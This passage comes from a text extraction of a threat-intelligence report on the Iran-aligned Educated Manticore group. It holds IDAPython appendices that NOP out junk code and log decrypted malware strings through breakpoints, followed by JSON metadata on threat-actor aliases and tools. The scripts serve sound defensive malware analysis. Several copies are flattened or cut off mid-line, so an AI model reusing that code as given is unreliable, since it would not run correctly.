idc.patch_byte(b,0x90) def\r\nDetectJunkBB(bb: idaapi.BasicBlock): global BBJunkCount global BBsJunk for head in idautils.Heads(bb.start_ea,\r\nbb.end_ea): if(idc.get_operand_type(head,1) == idc.o_imm and (idc.get_operand_value(head,1) \u0026 0xffffffff) ==\r\n0x9e3779b9): BBsJunk.append(bb) BBJunkCount += 1 for bbSS in bb.succs(): if(bbSS.start_ea == bb.start_ea): continue if\r\n(not [SShead for SShead in idautils.Heads(bbSS.start_ea, bbSS.end_ea) if idc.print_insn_mnem(SShead) == \"call\"]):\r\nBBsJunk.append(bbSS) BBJunkCount += 1 return BBJunkCount = 0 BBsJunk = [] funcs = idautils.Functions() for\r\nfuncAddr in funcs: func = idaapi.get_func(funcAddr) fChart = idaapi.FlowChart(func, None, idaapi.FC_PREDS |\r\nidaapi.FC_NOEXT) for bb in fChart: DetectJunkBB(bb) for bb in BBsJunk: NopRange(bb.start_ea, bb.end_ea)\r\nprint(\"Cleaned BBs with JUNK code: %d\" % (BBJunkCount))\r\nimport idaapi, idc, idautils\r\nhttps://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nPage 10 of 14\n\ndef NopRange(startEa, endEa):\r\n for b in range(startEa,endEa):\r\n idc.patch_byte(b,0x90)\r\n \r\ndef DetectJunkBB(bb: idaapi.BasicBlock):\r\n global BBJunkCount\r\n global BBsJunk\r\n for head in idautils.Heads(bb.start_ea, bb.end_ea):\r\n if(idc.get_operand_type(head,1) == idc.o_imm and (idc.get_operand_value(head,1) \u0026 0xffffffff) == 0x9e3\r\n BBsJunk.append(bb)\r\n BBJunkCount += 1\r\n for bbSS in bb.succs():\r\n if(bbSS.start_ea == bb.start_ea):\r\n continue\r\n \r\n if (not [SShead for SShead in idautils.Heads(bbSS.start_ea, bbSS.end_ea) if idc.print_insn_mne\r\n BBsJunk.append(bbSS)\r\n BBJunkCount += 1\r\n return\r\nBBJunkCount = 0\r\nBBsJunk = []\r\nfuncs = idautils.Functions()\r\nfor funcAddr in funcs:\r\n func = idaapi.get_func(funcAddr)\r\n fChart = idaapi.FlowChart(func, None, idaapi.FC_PREDS | idaapi.FC_NOEXT)\r\n for bb in fChart:\r\n DetectJunkBB(bb)\r\nfor bb in BBsJunk:\r\n NopRange(bb.start_ea, bb.end_ea)\r\nprint(\"Cleaned BBs with JUNK code: %d\" % (BBJunkCount))\r\nAppendix B – IDAPython script to decrypt the Educated Manticore binary strings\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nimport idaapi, idc, idautils\r\n# \"return False\" in condition - indicates not to break on BP, if \"return True\" the BP will break -\u003e use False just for logging\r\ncond = \"\"\"import idc\r\nRAX = idc.get_reg_value(\"rax\")\r\nRIP = idc.get_reg_value(\"rip\")\r\ndecString = idc.get_strlit_contents(RAX,-1, idc.STRTYPE_C16)\r\nif decString == None:\r\ndecString = idc.get_strlit_contents(RAX,-1, idc.STRTYPE_C)\r\nprint(\"Decrypted String: %s Address:0x%x\" % (decString ,RIP))\r\nidc.set_cmt(RIP, str(decString), False)\r\nhttps://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nPage 11 of 14\n\nloc = RIP\r\ncomment = str(decString)\r\ncfunc = idaapi.decompile(loc)\r\neamap = cfunc.get_eamap()\r\ndecompObjAddr = eamap[loc][0].ea\r\ntl = idaapi.treeloc_t()\r\ntl.ea = decompObjAddr\r\ncommentSet = False\r\nfor itp in range (idaapi.ITP_SEMI, idaapi.ITP_COLON):#range to cover different ending - orphans cmts\r\ntl.itp = itp\r\ncfunc.set_user_cmt(tl, comment)\r\ncfunc.save_user_cmts()\r\nunused = cfunc.__str__()\r\nif not cfunc.has_orphan_cmts():\r\ncommentSet = True\r\ncfunc.save_user_cmts()\r\nbreak\r\ncfunc.del_orphan_cmts()\r\nif not commentSet:\r\nprint (\"pseudo comment error at %08x\" % loc)\r\nreturn False\r\n\"\"\"\r\ndecryptionFunctions = [0x14000C650, 0x14000C770, 0x14000C890, 0x14000C9A0, 0x14000CAC0, 0x14002B010,\r\n0x14002B130, 0x14002B250, 0x14002B4F0, 0x14002B5E0, 0x14002B700, 0x140035200, 0x140035320]\r\nfor decFunc in decryptionFunctions:\r\ncodeRefs = idautils.CodeRefsTo(decFunc,1)\r\nfor ref in codeRefs:\r\nea = idc.next_head(ref)\r\nidaapi.add_bpt(ea, 0, idaapi.BPT_SOFT)\r\nbpt = idaapi.bpt_t()\r\nidaapi.get_bpt(ea, bpt)\r\nbpt.elang = 'Python'\r\nbpt.condition = cond\r\nidaapi.update_bpt(bpt)\r\nhttps://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nPage 12 of 14\n\nimport idaapi, idc, idautils # \"return False\" in condition - indicates not to break on BP, if \"return True\" the BP will break -\u003e\r\nuse False just for logging cond = \"\"\"import idc RAX = idc.get_reg_value(\"rax\") RIP = idc.get_reg_value(\"rip\") decString =\r\nidc.get_strlit_contents(RAX,-1, idc.STRTYPE_C16) if decString == None: decString = idc.get_strlit_contents(RAX,-1,\r\nidc.STRTYPE_C) print(\"Decrypted String: %s Address:0x%x\" % (decString ,RIP)) idc.set_cmt(RIP, str(decString), False)\r\nloc = RIP comment = str(decString) cfunc = idaapi.decompile(loc) eamap = cfunc.get_eamap() decompObjAddr =\r\neamap[loc][0].ea tl = idaapi.treeloc_t() tl.ea = decompObjAddr commentSet = False for itp in range (idaapi.ITP_SEMI,\r\nidaapi.ITP_COLON):#range to cover different ending - orphans cmts tl.itp = itp cfunc.set_user_cmt(tl, comment)\r\ncfunc.save_user_cmts() unused = cfunc.__str__() if not cfunc.has_orphan_cmts(): commentSet = True\r\ncfunc.save_user_cmts() break cfunc.del_orphan_cmts() if not commentSet: print (\"pseudo comment error at %08x\" % loc)\r\nreturn False \"\"\" decryptionFunctions = [0x14000C650, 0x14000C770, 0x14000C890, 0x14000C9A0, 0x14000CAC0,\r\n0x14002B010, 0x14002B130, 0x14002B250, 0x14002B4F0, 0x14002B5E0, 0x14002B700, 0x140035200, 0x140035320]\r\nfor decFunc in decryptionFunctions: codeRefs = idautils.CodeRefsTo(decFunc,1) for ref in codeRefs: ea =\r\nidc.next_head(ref) idaapi.add_bpt(ea, 0, idaapi.BPT_SOFT) bpt = idaapi.bpt_t() idaapi.get_bpt(ea, bpt) bpt.elang = 'Python'\r\nbpt.condition = cond idaapi.update_bpt(bpt)\r\nimport idaapi, idc, idautils\r\n# \"return False\" in condition - indicates not to break on BP, if \"return True\" the BP will break -\u003e use False\r\ncond = \"\"\"import idc\r\nRAX = idc.get_reg_value(\"rax\")\r\nRIP = idc.get_reg_value(\"rip\")\r\ndecString = idc.get_strlit_contents(RAX,-1, idc.STRTYPE_C16)\r\nif decString == None:\r\n decString = idc.get_strlit_contents(RAX,-1, idc.STRTYPE_C)\r\nprint(\"Decrypted String: %s Address:0x%x\" % (decString ,RIP))\r\nidc.set_cmt(RIP, str(decString), False)\r\nloc = RIP\r\ncomment = str(decString)\r\ncfunc = idaapi.decompile(loc)\r\neamap = cfunc.get_eamap()\r\ndecompObjAddr = eamap[loc][0].ea\r\ntl = idaapi.treeloc_t()\r\ntl.ea = decompObjAddr\r\ncommentSet = False\r\nfor itp in range (idaapi.ITP_SEMI, idaapi.ITP_COLON):#range to cover different ending - orphans cmts\r\n tl.itp = itp\r\n cfunc.set_user_cmt(tl, comment)\r\n cfunc.save_user_cmts()\r\n unused = cfunc.__str__()\r\n if not cfunc.has_orphan_cmts():\r\n commentSet = True\r\n cfunc.save_user_cmts()\r\n break\r\n cfunc.del_orphan_cmts()\r\nif not commentSet:\r\n print (\"pseudo comment error at %08x\" % loc)\r\nreturn False\r\n\"\"\"\r\ndecryptionFunctions = [0x14000C650, 0x14000C770, 0x14000C890, 0x14000C9A0, 0x14000CAC0, 0x14002B010, 0x14002B1\r\nfor decFunc in decryptionFunctions:\r\n codeRefs = idautils.CodeRefsTo(decFunc,1)\r\n for ref in codeRefs:\r\n ea = idc.next_head(ref)\r\n idaapi.add_bpt(ea, 0, idaapi.BPT_SOFT)\r\n bpt = idaapi.bpt_t()\r\n idaapi.get_bpt(ea, bpt)\r\n bpt.elang = 'Python'\r\n bpt.condition = cond\r\n idaapi.update_bpt(bpt)\r\nhttps://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nPage 13 of 14\n\nSource: https://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nhttps://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA", "MISPGALAXY" ], "references": [ "https://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/" ], "report_names": [ "educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools" ], "threat_actors": [ { "id": "82b92285-4588-48c9-8578-bb39f903cf62", "created_at": "2022-10-25T15:50:23.850506Z", "updated_at": "2026-04-10T02:00:05.418577Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "Charming Kitten" ], "source_name": "MITRE:Charming Kitten", "tools": [ "DownPaper" ], "source_id": "MITRE", "reports": null }, { "id": "d8af157e-741b-4933-bb4a-b78490951d97", "created_at": "2023-01-06T13:46:38.748929Z", "updated_at": "2026-04-10T02:00:03.087356Z", "deleted_at": null, "main_name": "APT35", "aliases": [ "COBALT MIRAGE", "Agent Serpens", "Newscaster Team", "Magic Hound", "G0059", "Phosphorus", "Mint Sandstorm", "TunnelVision" ], "source_name": "MISPGALAXY:APT35", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6b4a82e8-21f1-4bc7-84cf-e27334998b48", "created_at": "2022-10-25T16:07:23.84296Z", "updated_at": "2026-04-10T02:00:04.762229Z", "deleted_at": null, "main_name": "DEV-0270", "aliases": [ "DEV-0270", "DireFate", "Lord Nemesis", "Nemesis Kitten", "Yellow Dev 23", "Yellow Dev 24" ], "source_name": "ETDA:DEV-0270", "tools": [ "Impacket", "LOLBAS", "LOLBins", "Living off the Land", "WmiExec" ], "source_id": "ETDA", "reports": null }, { "id": "eaef3218-1f8c-4767-b1ff-da7a6662acc0", "created_at": "2023-03-04T02:01:54.110909Z", "updated_at": "2026-04-10T02:00:03.359871Z", "deleted_at": null, "main_name": "DEV-0270", "aliases": [ "Nemesis Kitten", "Storm-0270" ], "source_name": "MISPGALAXY:DEV-0270", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "029625d2-9734-44f9-9e10-b894b4f57f08", "created_at": "2023-01-06T13:46:38.364105Z", "updated_at": "2026-04-10T02:00:02.944092Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "iKittens", "Group 83", "NewsBeef", "G0058", "CharmingCypress", "Mint Sandstorm", "Parastoo" ], "source_name": "MISPGALAXY:Charming Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4", "created_at": "2022-10-25T15:50:23.808974Z", "updated_at": "2026-04-10T02:00:05.291959Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "Magic Hound", "TA453", "COBALT ILLUSION", "Charming Kitten", "ITG18", "Phosphorus", "APT35", "Mint Sandstorm" ], "source_name": "MITRE:Magic Hound", "tools": [ "Impacket", "CharmPower", "FRP", "Mimikatz", "Systeminfo", "ipconfig", "netsh", "PowerLess", "Pupy", "DownPaper", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03", "created_at": "2025-08-07T02:03:24.746965Z", "updated_at": "2026-04-10T02:00:03.640335Z", "deleted_at": null, "main_name": "COBALT ILLUSION", "aliases": [ "APT35 ", "APT42 ", "Agent Serpens Palo Alto", "Charming Kitten ", "CharmingCypress ", "Educated Manticore Checkpoint", "ITG18 ", "Magic Hound ", "Mint Sandstorm sub-group ", "NewsBeef ", "Newscaster ", "PHOSPHORUS sub-group ", "TA453 ", "UNC788 ", "Yellow Garuda " ], "source_name": "Secureworks:COBALT ILLUSION", "tools": [ "Browser Exploitation Framework (BeEF)", "MagicHound Toolset", "PupyRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "2bfa2cf4-e4ce-4599-ab28-d644208703d7", "created_at": "2025-08-07T02:03:24.764883Z", "updated_at": "2026-04-10T02:00:03.611225Z", "deleted_at": null, "main_name": "COBALT MIRAGE", "aliases": [ "DEV-0270 ", "Nemesis Kitten ", "PHOSPHORUS ", "TunnelVision ", "UNC2448 " ], "source_name": "Secureworks:COBALT MIRAGE", "tools": [ "BitLocker", "Custom powershell scripts", "DiskCryptor", "Drokbk", "FRPC", "Fast Reverse Proxy (FRP)", "Impacket wmiexec", "Ngrok", "Plink", "PowerLessCLR", "TunnelFish" ], "source_id": "Secureworks", "reports": null }, { "id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f", "created_at": "2022-10-25T16:07:23.83826Z", "updated_at": "2026-04-10T02:00:04.761303Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "APT 35", "Agent Serpens", "Ballistic Bobcat", "Charming Kitten", "CharmingCypress", "Cobalt Illusion", "Cobalt Mirage", "Educated Manticore", "G0058", "G0059", "Magic Hound", "Mint Sandstorm", "Operation BadBlood", "Operation Sponsoring Access", "Operation SpoofedScholars", "Operation Thamar Reservoir", "Phosphorus", "TA453", "TEMP.Beanie", "Tarh Andishan", "Timberworm", "TunnelVision", "UNC788", "Yellow Garuda" ], "source_name": "ETDA:Magic Hound", "tools": [ "7-Zip", "AnvilEcho", "BASICSTAR", "CORRUPT KITTEN", "CWoolger", "CharmPower", "ChromeHistoryView", "CommandCam", "DistTrack", "DownPaper", "FRP", "Fast Reverse Proxy", "FireMalv", "Ghambar", "GoProxy", "GorjolEcho", "HYPERSCRAPE", "Havij", "MPK", "MPKBot", "Matryoshka", "Matryoshka RAT", "MediaPl", "Mimikatz", "MischiefTut", "NETWoolger", "NOKNOK", "PINEFLOWER", "POWERSTAR", "PowerLess Backdoor", "PsList", "Pupy", "PupyRAT", "SNAILPROXY", "Shamoon", "TDTESS", "WinRAR", "WoolenLogger", "Woolger", "pupy", "sqlmap" ], "source_id": "ETDA", "reports": null }, { "id": "1efe328c-7bda-49d8-82bf-852d220110ae", "created_at": "2026-01-22T02:00:03.661882Z", "updated_at": "2026-04-10T02:00:03.917703Z", "deleted_at": null, "main_name": "Educated Manticore", "aliases": [], "source_name": "MISPGALAXY:Educated Manticore", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775572940, "ts_updated_at": 1775792160, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/5ec3b3f1448dedc2380d507e89ff1ce32973c1ed.pdf", "text": "https://archive.orkl.eu/5ec3b3f1448dedc2380d507e89ff1ce32973c1ed.txt", "img": "https://archive.orkl.eu/5ec3b3f1448dedc2380d507e89ff1ce32973c1ed.jpg" } }